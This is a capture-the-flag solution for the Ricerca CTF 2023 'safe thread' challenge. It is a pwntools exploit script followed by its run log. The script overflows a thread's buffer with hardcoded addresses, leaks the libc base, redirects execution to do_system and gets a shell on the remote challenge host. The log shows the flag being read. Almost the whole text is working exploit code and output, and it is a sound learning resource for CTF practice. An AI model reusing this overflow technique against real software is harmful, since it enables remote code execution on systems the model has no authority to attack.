Ricerca CTF 2023 - safe thread
#!/usr/bin/env python
from pwn import *
context.terminal = ['tmux', 'splitw', '-h']  # horizontal split window
# context.terminal = ['tmux', 'new-window']  # open new window
# libc = ELF('')
elf = ELF('./chall')  # target binary; its arch also configures pwntools below
context.update(os='linux', arch=elf.arch)
# context.log_level = 'debug'  # output verbose log

# Endpoints selected by the command-line option handled further down.
RHOST = "safe-thread.2023.ricercactf.com"
RPORT = 9004
LHOST = "127.0.0.1"
LPORT = 21700
def section_addr(name, elf=elf):
    """Return the load address (``sh_addr``) of section *name* in *elf*.

    *elf* defaults to the module-level target binary loaded above.
    """
    section = elf.get_section_by_name(name)
    return section.header['sh_addr']
def dbg(ss):
    """Log expression *ss* and its value as ``name: 0x...``.

    *ss* is a source-code expression written by the script author (e.g. a
    variable name) and is evaluated with ``eval`` in this module's scope; it is
    a debugging convenience, not something to feed with external input.
    """
    value = eval(ss)
    log.info(f"{ss}: 0x{value:x}")
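# Select the target from the first command-line argument (popped so the rest of
# argv is untouched): 'r' remote service, 'l' local listener, 'd' run under gdb,
# 'a' start the process and attach gdb, anything else a plain local process.
conn = None
opt = sys.argv.pop(1) if len(sys.argv) > 1 else '?'  # pop option
if opt in ('r', 'l'):
    # The original used `opt in 'rl'`, a substring test that also accepts ''
    # and 'rl' and then fails the dict lookup below with KeyError.
    host, port = {'r': (RHOST, RPORT), 'l': (LHOST, LPORT)}[opt]
    conn = remote(host, port)
elif opt == 'd':
    # The original formatted this address into a script with no `{}`
    # placeholder, so it was silently discarded. Keep it as a commented-out
    # breakpoint line (gdb treats `#` as a comment) so only `continue` runs,
    # exactly as before; uncomment it to stop at main / the entry point.
    start = elf.symbols['main'] if 'main' in elf.symbols else elf.entrypoint
    gdbscript = "# break *{:#x}\ncontinue\n".format(start)
    conn = gdb.debug(['./chall'], gdbscript=gdbscript)
else:
    conn = process(['./chall'])
    # conn = process(['./lazyhouse'], env={'LD_PRELOAD': ''})
    if opt == 'a':
        gdb.attach(conn)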
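# exploit
log.info('Pwning')

# The original passed str to sendafter(), which makes pwntools emit a
# BytesWarning ("Text is not bytes", visible in the run log); send bytes.
size_field = str(0x2000 + 1).encode() + b'\n'
conn.sendafter(b"size:", size_field)

# Buffer written after the "data" prompt. Every constant below (padding length,
# absolute addresses of this non-PIE binary) is specific to this challenge
# build and is reproduced unchanged from the original script.
payload = b'x' * 0x7d8
payload += p64(0x403f82)
payload += p64(0) * 10
payload += p64(0xdeadbeef) * 2 + p64(0x404100) + p64(0xdeadbee) + p64(0) + p64(0xbadbeef)
payload += p64(0x4012c3)
conn.sendafter(b"data", payload + b'\n')

# Leak: skip to the first NUL, take the next 7 bytes as the upper bytes of an
# 8-byte value (low byte 0x00) and rebase it by a libc-build-specific offset.
conn.recvuntil(b'\x00')
libc_base = u64(b'\x00' + conn.recv(7)) - 0x21af00
print(f"libc_base : {libc_base:#x}")

# Second buffer. The shift/mask recombination of (do_system ^ tcache_key) and
# the libc offsets are again taken verbatim from the original script.
tcache_key = 0x4012c3
do_system = libc_base + 0x508f0 + 2
mixed = do_system ^ tcache_key
addr = ((mixed << 0x11) & 0xffffffffffff8000) + ((mixed >> 0x2f) & 0x7fff)
payload = p64(addr) + p64(libc_base + 0x1d8698) + p64(0) + p64(0)
payload = payload.ljust(0x870, b'z')  # pad to a fixed length before the trailing value
payload += p64(libc_base - 0x4288)
conn.send(payload)
conn.interactive()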
root@u22:~/safe-thread# python3 exp.py r
[*] '/root/safe-thread/chall'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
[+] Opening connection to safe-thread.2023.ricercactf.com on port 9004: Done
[*] Pwning
/root/safe-thread/exp.py:41: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
conn.sendafter("size:", payload)
/usr/local/lib/python3.10/dist-packages/pwnlib/tubes/tube.py:812: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
res = self.recvuntil(delim, timeout=timeout)
libc_base : 0x7f54198ac000
[*] Switching to interactive mode
s\xac\x19\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\xac\x19\x7f\x00\x04\xac\x19\x7f\x00\x04\xac\x19\x7f\x00$
$ ls
bin
boot
dev
etc
flag-b620074ecec0a4693a967174b8d8d4af.txt
home
lib
lib32
lib64
libx32
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
$ cat flag*
RicSec{pthread_1s_w34k_t0_BOF_by_d3s1gn}
$